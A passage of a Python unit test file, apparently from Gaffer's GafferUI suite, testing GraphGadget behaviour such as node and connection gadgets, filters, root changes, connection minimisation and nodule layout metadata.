        gadget = GafferUI.GraphGadget( s )
        connection = gadget.connectionGadget( s["n2"]["i"] )
        # Union of the two node bounds, padded by a safety margin.
        expected = imath.Box3f()
        expected.extendBy( gadget.nodeGadget( s["n1"] ).bound() )
        expected.extendBy( gadget.nodeGadget( s["n2"] ).bound() )
        expected.setMin( expected.min() - imath.V3f( 10 ) )
        expected.setMax( expected.max() + imath.V3f( 10 ) )
        connectionBound = connection.bound()
        self.assertFalse( connectionBound.isEmpty() )
        self.assertTrue( IECore.BoxAlgo.contains( expected, connectionBound ) )
def testNoFilter( self ) :
    """Without a filter, every node in the root is shown, including late additions."""
    s = Gaffer.ScriptNode()
    s["n1"] = Gaffer.Node()
    g = GafferUI.GraphGadget( s )
    self.assertTrue( g.getRoot().isSame( s ) )
    # No filter supplied, so none is reported. (assertIsNone replaces
    # the non-idiomatic assertTrue( ... is None ).)
    self.assertIsNone( g.getFilter() )
    self.assertIsNotNone( g.nodeGadget( s["n1"] ) )
    s["n2"] = Gaffer.Node()
    self.assertIsNotNone( g.nodeGadget( s["n1"] ) )
    # The original test only re-checked n1 here; also verify that the
    # newly added node gained a gadget, which is the point of the test.
    self.assertIsNotNone( g.nodeGadget( s["n2"] ) )
def testFilterIsChildSet( self ) :
    """With a ChildSet filter, newly added nodes appear automatically."""
    script = Gaffer.ScriptNode()
    script["n1"] = Gaffer.Node()
    graph = GafferUI.GraphGadget( script, Gaffer.ChildSet( script ) )
    self.assertTrue( graph.nodeGadget( script["n1"] ) )
    numChildren = len( graph )
    script["n2"] = Gaffer.Node()
    # The new node is tracked by the ChildSet and gains a gadget.
    self.assertTrue( graph.nodeGadget( script["n2"] ) )
    self.assertEqual( len( graph ), numChildren + 1 )
def testSetRoot( self ) :
    """setRoot() switches the viewed graph and discards the current filter."""
    s = Gaffer.ScriptNode()
    s["b"] = Gaffer.Box()
    s["b"]["n"] = Gaffer.Node()
    f = Gaffer.StandardSet( [ s["b"] ] )
    g = GafferUI.GraphGadget( s, f )
    # Viewing the script : the box is visible, its contents are not.
    self.assertIsNotNone( g.nodeGadget( s["b"] ) )
    self.assertIsNone( g.nodeGadget( s["b"]["n"] ) )
    g.setRoot( s["b"] )
    self.assertTrue( g.getRoot().isSame( s["b"] ) )
    # Changing root resets the filter (assertIsNone replaces the
    # non-idiomatic assertEqual( ..., None )).
    self.assertIsNone( g.getFilter() )
    # Now the box contents are visible and the box itself is not.
    self.assertIsNotNone( g.nodeGadget( s["b"]["n"] ) )
    self.assertIsNone( g.nodeGadget( s["b"] ) )
def testRootChangedSignal( self ) :
    """rootChangedSignal fires once per actual root change, carrying the previous root."""
    s = Gaffer.ScriptNode()
    s["b"] = Gaffer.Box()
    history = []  # ( newRoot, previousRoot ) pairs, in signal order
    def recordRootChange( gadget, previousRoot ) :
        self.assertTrue( gadget.isSame( g ) )
        history.append( ( gadget.getRoot(), previousRoot ) )
    g = GafferUI.GraphGadget( s )
    # Keep the connection alive for the duration of the test.
    connection = g.rootChangedSignal().connect( recordRootChange )
    self.assertEqual( history, [] )
    g.setRoot( s["b"] )
    self.assertEqual( len( history ), 1 )
    self.assertTrue( history[0][0].isSame( s["b"] ) )
    self.assertTrue( history[0][1].isSame( s ) )
    # Setting the same root again must not re-signal.
    g.setRoot( s["b"] )
    self.assertEqual( len( history ), 1 )
    self.assertTrue( history[0][0].isSame( s["b"] ) )
    self.assertTrue( history[0][1].isSame( s ) )
    # Changing back signals once more, with the box as previous root.
    g.setRoot( s )
    self.assertEqual( len( history ), 2 )
    self.assertTrue( history[1][0].isSame( s ) )
    self.assertTrue( history[1][1].isSame( s["b"] ) )
def testSetNodePosition( self ) :
    """setNodePosition() stores a position retrievable via getNodePosition()."""
    script = Gaffer.ScriptNode()
    script["n"] = Gaffer.Node()
    graph = GafferUI.GraphGadget( script )
    self.assertFalse( graph.hasNodePosition( script["n"] ) )
    position = imath.V2f( -100, 2000 )
    graph.setNodePosition( script["n"], position )
    self.assertEqual( graph.getNodePosition( script["n"] ), position )
    self.assertTrue( graph.hasNodePosition( script["n"] ) )
def testPlugConnectionGadgets( self ) :
    """connectionGadgets( plug ) lists outgoing connections, honouring excludedNodes."""
    s = Gaffer.ScriptNode()
    for name in ( "add1", "add2", "add3", "add4" ) :
        s[name] = GafferTest.AddNode()
    s["add2"]["op1"].setInput( s["add1"]["sum"] )
    s["add3"]["op1"].setInput( s["add2"]["sum"] )
    s["add4"]["op2"].setInput( s["add2"]["sum"] )
    g = GafferUI.GraphGadget( s )
    def assertConnection( connection, src, dst ) :
        self.assertTrue( connection.srcNodule().plug().isSame( src ) )
        self.assertTrue( connection.dstNodule().plug().isSame( dst ) )
    connections = g.connectionGadgets( s["add1"]["sum"] )
    self.assertEqual( len( connections ), 1 )
    assertConnection( connections[0], s["add1"]["sum"], s["add2"]["op1"] )
    # Excluding the destination node suppresses the connection.
    connections = g.connectionGadgets( s["add1"]["sum"], excludedNodes = Gaffer.StandardSet( [ s["add2"] ] ) )
    self.assertEqual( len( connections ), 0 )
    connections = g.connectionGadgets( s["add2"]["sum"] )
    self.assertEqual( len( connections ), 2 )
    assertConnection( connections[0], s["add2"]["sum"], s["add3"]["op1"] )
    assertConnection( connections[1], s["add2"]["sum"], s["add4"]["op2"] )
    connections = g.connectionGadgets( s["add2"]["sum"], excludedNodes = Gaffer.StandardSet( [ s["add3"] ] ) )
    self.assertEqual( len( connections ), 1 )
    assertConnection( connections[0], s["add2"]["sum"], s["add4"]["op2"] )
def testNodeConnectionGadgets( self ) :
    """connectionGadgets( node ) lists all connections in and out of a node."""
    s = Gaffer.ScriptNode()
    for name in ( "add1", "add2", "add3", "add4" ) :
        s[name] = GafferTest.AddNode()
    s["add2"]["op1"].setInput( s["add1"]["sum"] )
    s["add3"]["op1"].setInput( s["add2"]["sum"] )
    s["add4"]["op2"].setInput( s["add2"]["sum"] )
    g = GafferUI.GraphGadget( s )
    def assertConnection( connection, src, dst ) :
        self.assertTrue( connection.srcNodule().plug().isSame( src ) )
        self.assertTrue( connection.dstNodule().plug().isSame( dst ) )
    connections = g.connectionGadgets( s["add1"] )
    self.assertEqual( len( connections ), 1 )
    assertConnection( connections[0], s["add1"]["sum"], s["add2"]["op1"] )
    # Excluding the only peer suppresses everything.
    connections = g.connectionGadgets( s["add1"], excludedNodes = Gaffer.StandardSet( [ s["add2"] ] ) )
    self.assertEqual( len( connections ), 0 )
    # add2 has one input and two output connections.
    connections = g.connectionGadgets( s["add2"] )
    self.assertEqual( len( connections ), 3 )
    assertConnection( connections[0], s["add1"]["sum"], s["add2"]["op1"] )
    assertConnection( connections[1], s["add2"]["sum"], s["add3"]["op1"] )
    assertConnection( connections[2], s["add2"]["sum"], s["add4"]["op2"] )
    connections = g.connectionGadgets( s["add2"], excludedNodes = Gaffer.StandardSet( [ s["add3"] ] ) )
    self.assertEqual( len( connections ), 2 )
    assertConnection( connections[0], s["add1"]["sum"], s["add2"]["op1"] )
    assertConnection( connections[1], s["add2"]["sum"], s["add4"]["op2"] )
def testInternalConnectionsNotShown( self ) :
    """Connections internal to a single node must never get connection gadgets."""
    def assertNoInternalConnections( g, node ) :
        # Neither the per-node query nor any per-plug query sees them.
        # (assertIsNone replaces the non-idiomatic assertEqual( ..., None ).)
        self.assertEqual( len( g.connectionGadgets( node ) ), 0 )
        for plugName in ( "sum", "op1", "op2" ) :
            self.assertIsNone( g.connectionGadget( node[plugName] ) )
    # Case 1 : connections exist before the graph is visualised.
    script = Gaffer.ScriptNode()
    script["add1"] = GafferTest.AddNode()
    script["add1"]["sum"].setInput( script["add1"]["op1"] )
    script["add1"]["op1"].setInput( script["add1"]["op2"] )
    g = GafferUI.GraphGadget( script )
    assertNoInternalConnections( g, script["add1"] )
    # Case 2 : connections are made after the graph is visualised.
    script = Gaffer.ScriptNode()
    g = GafferUI.GraphGadget( script )
    script["add1"] = GafferTest.AddNode()
    script["add1"]["sum"].setInput( script["add1"]["op1"] )
    script["add1"]["op1"].setInput( script["add1"]["op2"] )
    assertNoInternalConnections( g, script["add1"] )
def testConnectionMinimisedAccessors( self ) :
    """get/setNode{Input,Output}ConnectionsMinimised round-trip per node."""
    s = Gaffer.ScriptNode()
    for name in ( "add1", "add2", "add3" ) :
        s[name] = GafferTest.AddNode()
    s["add2"]["op1"].setInput( s["add1"]["sum"] )
    s["add3"]["op1"].setInput( s["add2"]["sum"] )
    g = GafferUI.GraphGadget( s )
    nodes = ( s["add1"], s["add2"], s["add3"] )
    def assertMinimised( inputFlags, outputFlags ) :
        # Check the input flag then the output flag for add1..add3.
        for node, expected in zip( nodes, inputFlags ) :
            ( self.assertTrue if expected else self.assertFalse )( g.getNodeInputConnectionsMinimised( node ) )
        for node, expected in zip( nodes, outputFlags ) :
            ( self.assertTrue if expected else self.assertFalse )( g.getNodeOutputConnectionsMinimised( node ) )
    assertMinimised( ( False, False, False ), ( False, False, False ) )
    g.setNodeInputConnectionsMinimised( s["add3"], True )
    assertMinimised( ( False, False, True ), ( False, False, False ) )
    g.setNodeOutputConnectionsMinimised( s["add2"], True )
    assertMinimised( ( False, False, True ), ( False, True, False ) )
    g.setNodeOutputConnectionsMinimised( s["add2"], False )
    assertMinimised( ( False, False, True ), ( False, False, False ) )
    g.setNodeInputConnectionsMinimised( s["add3"], False )
    assertMinimised( ( False, False, False ), ( False, False, False ) )
def testConnectionMinimisation( self ) :
    """A connection is minimised while either endpoint's node requests it."""
    s = Gaffer.ScriptNode()
    for name in ( "add1", "add2", "add3" ) :
        s[name] = GafferTest.AddNode()
    g = GafferUI.GraphGadget( s )
    g.setNodeOutputConnectionsMinimised( s["add1"], True )
    # A connection made from a minimised-output node starts minimised.
    s["add2"]["op1"].setInput( s["add1"]["sum"] )
    first = g.connectionGadget( s["add2"]["op1"] )
    self.assertTrue( first.getMinimised() )
    s["add3"]["op1"].setInput( s["add2"]["sum"] )
    second = g.connectionGadget( s["add3"]["op1"] )
    self.assertFalse( second.getMinimised() )
    # Minimising add2's inputs keeps `first` minimised even after
    # add1's output minimisation is turned off.
    g.setNodeInputConnectionsMinimised( s["add2"], True )
    self.assertTrue( first.getMinimised() )
    self.assertFalse( second.getMinimised() )
    g.setNodeOutputConnectionsMinimised( s["add1"], False )
    self.assertTrue( first.getMinimised() )
    self.assertFalse( second.getMinimised() )
    # With both endpoints un-minimised, the connection follows suit.
    g.setNodeInputConnectionsMinimised( s["add2"], False )
    self.assertFalse( first.getMinimised() )
    self.assertFalse( second.getMinimised() )
def testNodeGadgetCreatorReturningNull( self ) :
    """A registered gadget creator may return None to suppress node display."""
    class InvisibleNode( GafferTest.AddNode ) :
        def __init__( self, name = "InvisibleNode" ) :
            GafferTest.AddNode.__init__( self, name )
    IECore.registerRunTimeTyped( InvisibleNode )
    # The creator returns None, so no gadget is ever made for this type.
    GafferUI.NodeGadget.registerNodeGadget( InvisibleNode, lambda node : None )
    script = Gaffer.ScriptNode()
    g = GafferUI.GraphGadget( script )
    script["n1"] = InvisibleNode()
    script["n2"] = InvisibleNode()
    # assertIsNone replaces the non-idiomatic assertEqual( ..., None ).
    self.assertIsNone( g.nodeGadget( script["n1"] ) )
    self.assertIsNone( g.nodeGadget( script["n2"] ) )
    # With no node gadgets there can be no connection gadget either.
    script["n2"]["op1"].setInput( script["n1"]["sum"] )
    self.assertIsNone( g.connectionGadget( script["n2"]["op1"] ) )
    # In case it wasn't clear, hiding the nodes has zero
    # effect on their computations.
    script["n1"]["op1"].setValue( 12 )
    script["n1"]["op2"].setValue( 13 )
    script["n2"]["op2"].setValue( 100 )
    self.assertEqual( script["n2"]["sum"].getValue(), 125 )
def testUpstreamNodeGadgets( self ) :
    """upstreamNodeGadgets() finds visible ancestors, limited by degreesOfSeparation."""
    s = Gaffer.ScriptNode()
    # a -> b -> c -> e -> f
    #           ^
    #           |
    #           d
    for name in ( "a", "b", "c", "d", "e", "f" ) :
        s[name] = GafferTest.AddNode()
    s["b"]["op1"].setInput( s["a"]["sum"] )
    s["c"]["op1"].setInput( s["b"]["sum"] )
    s["c"]["op2"].setInput( s["d"]["sum"] )
    s["e"]["op1"].setInput( s["c"]["sum"] )
    s["f"]["op1"].setInput( s["e"]["sum"] )
    g = GafferUI.GraphGadget( s )
    def upstreamNames( node, **kw ) :
        return [ x.node().relativeName( s ) for x in g.upstreamNodeGadgets( node, **kw ) ]
    u = upstreamNames( s["c"] )
    self.assertEqual( len( u ), 3 )
    self.assertEqual( set( u ), { "a", "b", "d" } )
    u = upstreamNames( s["f"] )
    self.assertEqual( len( u ), 5 )
    self.assertEqual( set( u ), { "a", "b", "d", "c", "e" } )
    # degreesOfSeparation limits the depth of the search.
    u = upstreamNames( s["c"], degreesOfSeparation = 1 )
    self.assertEqual( len( u ), 2 )
    self.assertEqual( set( u ), { "b", "d" } )
    # Nodes hidden by the filter are ignored.
    g.setFilter( Gaffer.StandardSet( [ s["f"], s["e"], s["a"] ] ) )
    self.assertEqual( upstreamNames( s["f"] ), [ "e" ] )
def testDownstreamNodeGadgets( self ) :
    """downstreamNodeGadgets() finds visible descendants, limited by degreesOfSeparation."""
    s = Gaffer.ScriptNode()
    # a -> b -> c -> e -> f
    #           |
    #           v
    #           d
    for name in ( "a", "b", "c", "d", "e", "f" ) :
        s[name] = GafferTest.AddNode()
    s["b"]["op1"].setInput( s["a"]["sum"] )
    s["c"]["op1"].setInput( s["b"]["sum"] )
    s["d"]["op1"].setInput( s["c"]["sum"] )
    s["e"]["op1"].setInput( s["c"]["sum"] )
    s["f"]["op1"].setInput( s["e"]["sum"] )
    g = GafferUI.GraphGadget( s )
    def downstreamNames( node, **kw ) :
        return [ x.node().relativeName( s ) for x in g.downstreamNodeGadgets( node, **kw ) ]
    u = downstreamNames( s["b"] )
    self.assertEqual( len( u ), 4 )
    self.assertEqual( set( u ), { "c", "d", "e", "f" } )
    u = downstreamNames( s["e"] )
    self.assertEqual( len( u ), 1 )
    self.assertEqual( set( u ), { "f" } )
    # degreesOfSeparation limits the depth of the search.
    u = downstreamNames( s["c"], degreesOfSeparation = 1 )
    self.assertEqual( len( u ), 2 )
    self.assertEqual( set( u ), { "d", "e" } )
def testConnectedNodeGadgets( self ) :
    """connectedNodeGadgets() traverses both ways, honouring direction, depth and filter."""
    s = Gaffer.ScriptNode()
    # a -> b -> c -> e -> f
    #           |
    #           v
    #           d
    for name in ( "a", "b", "c", "d", "e", "f" ) :
        s[name] = GafferTest.AddNode()
    s["b"]["op1"].setInput( s["a"]["sum"] )
    s["c"]["op1"].setInput( s["b"]["sum"] )
    s["d"]["op1"].setInput( s["c"]["sum"] )
    s["e"]["op1"].setInput( s["c"]["sum"] )
    s["f"]["op1"].setInput( s["e"]["sum"] )
    g = GafferUI.GraphGadget( s )
    def connectedNames( node, **kw ) :
        return { x.node().relativeName( s ) for x in g.connectedNodeGadgets( node, **kw ) }
    # Traversal in both directions.
    self.assertEqual( connectedNames( s["b"] ), { "a", "c", "d", "e", "f" } )
    self.assertEqual( connectedNames( s["e"] ), { "a", "b", "c", "d", "f" } )
    self.assertEqual( connectedNames( s["c"], degreesOfSeparation = 1 ), { "b", "d", "e" } )
    # Upstream only.
    self.assertEqual( connectedNames( s["c"], direction = Gaffer.Plug.Direction.In ), { "a", "b" } )
    self.assertEqual( connectedNames( s["c"], direction = Gaffer.Plug.Direction.In, degreesOfSeparation = 1 ), { "b" } )
    # Downstream only.
    self.assertEqual( connectedNames( s["c"], direction = Gaffer.Plug.Direction.Out ), { "d", "e", "f" } )
    self.assertEqual( connectedNames( s["c"], direction = Gaffer.Plug.Direction.Out, degreesOfSeparation = 1 ), { "d", "e" } )
    # Nodes hidden by the filter are ignored.
    g.setFilter( Gaffer.StandardSet( [ s["f"], s["e"], s["c"] ] ) )
    self.assertEqual( connectedNames( s["e"] ), { "f", "c" } )
    self.assertEqual( connectedNames( s["e"], direction = Gaffer.Plug.Direction.In ), { "c" } )
    self.assertEqual( connectedNames( s["e"], direction = Gaffer.Plug.Direction.Out ), { "f" } )
def testSelectionHighlighting( self ) :
    """Node gadgets track membership of the script selection via highlighting."""
    s = Gaffer.ScriptNode()
    s["a"] = GafferTest.AddNode()
    s["b"] = GafferTest.AddNode()
    # Select "a" before the gadget exists, so initial state is also tested.
    s.selection().add( s["a"] )
    g = GafferUI.GraphGadget( s )
    def assertHighlighted( aState, bState ) :
        for node, state in ( ( s["a"], aState ), ( s["b"], bState ) ) :
            ( self.assertTrue if state else self.assertFalse )( g.nodeGadget( node ).getHighlighted() )
    assertHighlighted( True, False )
    s.selection().add( s["b"] )
    assertHighlighted( True, True )
    s.selection().remove( s["a"] )
    assertHighlighted( False, True )
    s.selection().clear()
    assertHighlighted( False, False )
def testNoDuplicatePositionPlugsAfterPasting( self ) :
    """Duplicating a positioned node must not grow a second __uiPosition plug."""
    script = Gaffer.ScriptNode()
    script["n"] = Gaffer.Node()
    g = GafferUI.GraphGadget( script )
    g.setNodePosition( script["n"], imath.V2f( 1, 2 ) )
    self.assertTrue( g.hasNodePosition( script["n"] ) )
    # Serialise and re-execute to duplicate the node as "n1".
    script.execute( script.serialise( script, Gaffer.StandardSet( [ script["n"] ] ) ) )
    # assertIn/assertNotIn replace the non-idiomatic assertTrue( x in y ).
    self.assertIn( "__uiPosition", script["n1"] )
    self.assertNotIn( "__uiPosition1", script["n1"] )
def testErrorAndDelete( self ) :
    """Deleting a node that errored on a background thread must not crash later idle events."""
    # A script with a dodgy node, and a GraphGadget displaying it.
    script = Gaffer.ScriptNode()
    script["n"] = GafferTest.BadNode()
    graphGadget = GafferUI.GraphGadget( script )
    # Trigger the node's error from a background thread.
    def triggerError() :
        with IECore.IgnoredExceptions( Exception ) :
            script["n"]["out1"].getValue()
    worker = threading.Thread( target = triggerError )
    worker.start()
    worker.join()
    # Delete the node on the foreground thread - this removes
    # the NodeGadget inside the GraphGadget.
    del script["n"]
    # Run idle events. Woe betide any NodeGadget implementation
    # assuming it will still be alive at arbitrary points in the future!
    self.waitForIdle( 1000 )
def testMovePlugWithInputConnection( self ) :
    """Reparenting a connected plug moves its connection gadget to the new node."""
    s = Gaffer.ScriptNode()
    s["n1"] = Gaffer.Node()
    s["n1"]["p"] = Gaffer.Plug()
    s["n2"] = Gaffer.Node()
    s["n2"]["p"] = Gaffer.Plug()
    s["n2"]["p"].setInput( s["n1"]["p"] )
    g = GafferUI.GraphGadget( s )
    # Move the destination plug from n2 onto a new node n3.
    s["n3"] = Gaffer.Node()
    s["n3"]["p"] = s["n2"]["p"]
    connection = g.connectionGadget( s["n3"]["p"] )
    src = connection.srcNodule()
    dst = connection.dstNodule()
    self.assertTrue( dst.plug().isSame( s["n3"]["p"] ) )
    self.assertTrue( src.plug().isSame( s["n1"]["p"] ) )
    # The nodules live under the gadgets of the current parent nodes.
    self.assertTrue( g.nodeGadget( s["n1"] ).isAncestorOf( src ) )
    self.assertTrue( g.nodeGadget( s["n3"] ).isAncestorOf( dst ) )
def testMovePlugWithInputConnectionOutsideGraph( self ) :
    """Moving a connected plug to a node outside the script yields no connection gadget."""
    script = Gaffer.ScriptNode()
    script["n1"] = Gaffer.Node()
    script["n1"]["p"] = Gaffer.Plug()
    script["n2"] = Gaffer.Node()
    script["n2"]["p"] = Gaffer.Plug()
    script["n2"]["p"].setInput( script["n1"]["p"] )
    g = GafferUI.GraphGadget( script )
    # Reparent the destination plug onto a node that is not in the script.
    n3 = Gaffer.Node()
    n3["p"] = script["n2"]["p"]
    # assertIsNone replaces the non-idiomatic assertEqual( ..., None ).
    self.assertIsNone( g.connectionGadget( n3["p"] ) )
def testRemoveNoduleWithInputConnection( self ) :
    """Suppressing the destination nodule via metadata removes the connection gadget."""
    script = Gaffer.ScriptNode()
    script["n1"] = Gaffer.Node()
    script["n1"]["p"] = Gaffer.Plug()
    script["n2"] = Gaffer.Node()
    script["n2"]["p"] = Gaffer.Plug()
    script["n2"]["p"].setInput( script["n1"]["p"] )
    g = GafferUI.GraphGadget( script )
    # assertIsNotNone/assertIsNone replace assertTrue( x is (not) None ).
    self.assertIsNotNone( g.nodeGadget( script["n2"] ).nodule( script["n2"]["p"] ) )
    self.assertIsNotNone( g.connectionGadget( script["n2"]["p"] ) )
    # An empty "nodule:type" suppresses the nodule entirely.
    Gaffer.Metadata.registerValue( script["n2"]["p"], "nodule:type", "" )
    self.assertIsNone( g.nodeGadget( script["n2"] ).nodule( script["n2"]["p"] ) )
    self.assertIsNone( g.connectionGadget( script["n2"]["p"] ) )
def testRemoveNoduleWithOutputConnections( self ) :
    """Hiding the source nodule leaves a dangling connection; restoring reconnects it."""
    script = Gaffer.ScriptNode()
    script["n1"] = Gaffer.Node()
    script["n1"]["out"] = Gaffer.Plug( direction = Gaffer.Plug.Direction.Out )
    script["n2"] = Gaffer.Node()
    script["n2"]["in"] = Gaffer.Plug()
    script["n2"]["in"].setInput( script["n1"]["out"] )
    g = GafferUI.GraphGadget( script )
    # assertIsNotNone/assertIsNone replace assertTrue( x is (not) None ).
    c = g.connectionGadget( script["n2"]["in"] )
    self.assertIsNotNone( c )
    self.assertTrue( c.srcNodule().plug().isSame( script["n1"]["out"] ) )
    self.assertTrue( c.dstNodule().plug().isSame( script["n2"]["in"] ) )
    # Hide the source nodule : the connection remains but dangles.
    Gaffer.Metadata.registerValue( script["n1"]["out"], "nodule:type", "" )
    c = g.connectionGadget( script["n2"]["in"] )
    self.assertIsNotNone( c )
    self.assertIsNone( c.srcNodule() )
    self.assertTrue( c.dstNodule().plug().isSame( script["n2"]["in"] ) )
    # Restore the nodule : the connection is fully reattached.
    Gaffer.Metadata.registerValue( script["n1"]["out"], "nodule:type", "GafferUI::StandardNodule" )
    c = g.connectionGadget( script["n2"]["in"] )
    self.assertIsNotNone( c )
    self.assertTrue( c.srcNodule().plug().isSame( script["n1"]["out"] ) )
    self.assertTrue( c.dstNodule().plug().isSame( script["n2"]["in"] ) )
def testAddNoduleWithInputConnection( self ) :
    """Re-enabling a suppressed nodule must not create a gadget for an internal connection."""
    script = Gaffer.ScriptNode()
    script["n"] = Gaffer.Node()
    script["n"]["in"] = Gaffer.Plug()
    script["n"]["out"] = Gaffer.Plug( direction = Gaffer.Plug.Direction.Out )
    # The connection is internal to the node.
    script["n"]["out"].setInput( script["n"]["in"] )
    Gaffer.Metadata.registerValue( script["n"]["out"], "nodule:type", "" )
    g = GafferUI.GraphGadget( script )
    # assertIsNotNone/assertIsNone replace assertTrue( x is (not) None ).
    self.assertIsNone( g.nodeGadget( script["n"] ).nodule( script["n"]["out"] ) )
    self.assertIsNone( g.connectionGadget( script["n"]["out"] ) )
    Gaffer.Metadata.registerValue( script["n"]["out"], "nodule:type", "GafferUI::StandardNodule" )
    self.assertIsNotNone( g.nodeGadget( script["n"] ).nodule( script["n"]["out"] ) )
    # Still no connection gadget, because internal connections are never shown.
    self.assertIsNone( g.connectionGadget( script["n"]["out"] ) )
def testAddNoduleWithOutputConnection( self ) :
    """Re-enabling the source nodule reattaches an existing dangling connection."""
    script = Gaffer.ScriptNode()
    script["n1"] = Gaffer.Node()
    script["n1"]["out"] = Gaffer.Plug( direction = Gaffer.Plug.Direction.Out )
    script["n2"] = Gaffer.Node()
    script["n2"]["in"] = Gaffer.Plug()
    script["n2"]["in"].setInput( script["n1"]["out"] )
    Gaffer.Metadata.registerValue( script["n1"]["out"], "nodule:type", "" )
    g = GafferUI.GraphGadget( script )
    # assertIsNotNone/assertIsNone replace assertTrue( x is (not) None ).
    self.assertIsNone( g.nodeGadget( script["n1"] ).nodule( script["n1"]["out"] ) )
    # The connection exists but dangles, since the source nodule is hidden.
    self.assertIsNotNone( g.connectionGadget( script["n2"]["in"] ) )
    self.assertIsNone( g.connectionGadget( script["n2"]["in"] ).srcNodule() )
    Gaffer.Metadata.registerValue( script["n1"]["out"], "nodule:type", "GafferUI::StandardNodule" )
    self.assertIsNotNone( g.nodeGadget( script["n1"] ).nodule( script["n1"]["out"] ) )
    self.assertIsNotNone( g.connectionGadget( script["n2"]["in"] ) )
    self.assertIsNotNone( g.connectionGadget( script["n2"]["in"] ).srcNodule() )
def testRemoveNonNodulePlug( self ) :
    """Deleting a plug whose nodule is suppressed must not crash."""
    s = Gaffer.ScriptNode()
    s["n"] = Gaffer.Node()
    s["n"]["p"] = Gaffer.Plug()
    Gaffer.Metadata.registerValue( s["n"]["p"], "nodule:type", "" )
    g = GafferUI.GraphGadget( s )
    # assertIsNone replaces the non-idiomatic assertTrue( x is None ).
    self.assertIsNone( g.nodeGadget( s["n"] ).nodule( s["n"]["p"] ) )
    # Once upon a time, this would crash.
    del s["n"]["p"]
def testEnabledException( self ) :
    """A throwing "enabled" expression must not prevent node gadget creation."""
    s = Gaffer.ScriptNode()
    s["n"] = GafferTest.AddNode()
    s["e"] = Gaffer.Expression()
    # The expression errors when evaluated ("undefinedVariable" does not exist).
    s["e"].setExpression( "parent['n']['enabled'] = undefinedVariable" )
    g = GafferUI.GraphGadget( s )
    # assertIsNotNone replaces the non-idiomatic assertTrue( x is not None ).
    self.assertIsNotNone( g.nodeGadget( s["n"] ) )
def testLayoutAccessors( self ) :
    """getLayout()/setLayout() round-trip layout instances."""
    s = Gaffer.ScriptNode()
    g = GafferUI.GraphGadget( s )
    defaultLayout = g.getLayout()
    # assertIsInstance replaces the non-idiomatic assertTrue( isinstance( ... ) ).
    self.assertIsInstance( defaultLayout, GafferUI.StandardGraphLayout )
    newLayout = GafferUI.StandardGraphLayout()
    g.setLayout( newLayout )
    self.assertTrue( g.getLayout().isSame( newLayout ) )
    g.setLayout( defaultLayout )
    self.assertTrue( g.getLayout().isSame( defaultLayout ) )
def testUnpositionedNodeGadgets( self ) :
    """Gadgets for nodes without a stored position are reported until positioned."""
    script = Gaffer.ScriptNode()
    graph = GafferUI.GraphGadget( script )
    script["n"] = Gaffer.Node()
    self.assertEqual( graph.unpositionedNodeGadgets(), [ graph.nodeGadget( script["n"] ) ] )
    # Positioning the node empties the list.
    graph.setNodePosition( script["n"], imath.V2f( 0 ) )
    self.assertEqual( graph.unpositionedNodeGadgets(), [] )
def testInputConnectionMaintainedOnNoduleMove( self ) :
    """Moving the destination nodule between layout sections keeps the connection intact."""
    s = Gaffer.ScriptNode()
    g = GafferUI.GraphGadget( s )
    s["n1"] = GafferTest.AddNode()
    s["n2"] = GafferTest.AddNode()
    s["n2"]["op1"].setInput( s["n1"]["sum"] )
    # assertIsNotNone replaces the non-idiomatic assertTrue( x is not None ).
    self.assertIsNotNone( g.connectionGadget( s["n2"]["op1"] ) )
    for section in ( "top", "bottom", "top", "left", "right", "left", "bottom", "right" ) :
        Gaffer.Metadata.registerValue( s["n2"]["op1"], "noduleLayout:section", section )
        connection = g.connectionGadget( s["n2"]["op1"] )
        self.assertIsNotNone( connection )
        self.assertIsNotNone( connection.srcNodule() )
        self.assertTrue( connection.srcNodule().isSame( g.nodeGadget( s["n1"] ).nodule( s["n1"]["sum"] ) ) )
        self.assertTrue( connection.dstNodule().isSame( g.nodeGadget( s["n2"] ).nodule( s["n2"]["op1"] ) ) )
def testOutputConnectionMaintainedOnNoduleMove( self ) :
    """Moving the source nodule between layout sections keeps the connection intact."""
    s = Gaffer.ScriptNode()
    g = GafferUI.GraphGadget( s )
    s["n1"] = GafferTest.AddNode()
    s["n2"] = GafferTest.AddNode()
    s["n2"]["op1"].setInput( s["n1"]["sum"] )
    # assertIsNotNone replaces the non-idiomatic assertTrue( x is not None ).
    self.assertIsNotNone( g.connectionGadget( s["n2"]["op1"] ) )
    for section in ( "top", "bottom", "top", "left", "right", "left", "bottom", "right" ) :
        Gaffer.Metadata.registerValue( s["n1"]["sum"], "noduleLayout:section", section )
        connection = g.connectionGadget( s["n2"]["op1"] )
        self.assertIsNotNone( connection )
        self.assertIsNotNone( connection.srcNodule() )
        self.assertTrue( connection.srcNodule().isSame( g.nodeGadget( s["n1"] ).nodule( s["n1"]["sum"] ) ) )
        self.assertTrue( connection.dstNodule().isSame( g.nodeGadget( s["n2"] ).nodule( s["n2"]["op1"] ) ) )
def testInputConnectionMaintainedOnNestedNoduleMove( self ) :
    """Moving a compound nodule between layout sections keeps nested connections intact."""
    s = Gaffer.ScriptNode()
    g = GafferUI.GraphGadget( s )
    s["n1"] = GafferTest.AddNode()
    s["n2"] = GafferTest.ArrayPlugNode()
    Gaffer.Metadata.registerValue( s["n2"]["in"], "nodule:type", "GafferUI::CompoundNodule" )
    s["n2"]["in"][0].setInput( s["n1"]["sum"] )
    # assertIsNotNone replaces the non-idiomatic assertTrue( x is not None ).
    self.assertIsNotNone( g.connectionGadget( s["n2"]["in"][0] ) )
    for section in ( "top", "bottom", "top", "left", "right", "left", "bottom", "right" ) :
        # Move the parent compound nodule; the nested child connection must follow.
        Gaffer.Metadata.registerValue( s["n2"]["in"], "noduleLayout:section", section )
        connection = g.connectionGadget( s["n2"]["in"][0] )
        self.assertIsNotNone( connection )
        self.assertIsNotNone( connection.srcNodule() )
        self.assertTrue( connection.srcNodule().isSame( g.nodeGadget( s["n1"] ).nodule( s["n1"]["sum"] ) ) )
        self.assertTrue( connection.dstNodule().isSame( g.nodeGadget( s["n2"] ).nodule( s["n2"]["in"][0] ) ) )
def testNodeGadgetMetadataChanges( self ) :
    """The "nodeGadget:type" metadata hides and shows node gadgets dynamically."""
    s = Gaffer.ScriptNode()
    g = GafferUI.GraphGadget( s )
    s["n1"] = GafferTest.AddNode()
    s["n2"] = GafferTest.AddNode()
    s["n2"]["op1"].setInput( s["n1"]["sum"] )
    # assertIsInstance/assertIsNone replace assertTrue( isinstance( ... ) )
    # and assertTrue( x is None ) throughout.
    def assertBothVisible() :
        ng1 = g.nodeGadget( s["n1"] )
        ng2 = g.nodeGadget( s["n2"] )
        c = g.connectionGadget( s["n2"]["op1"] )
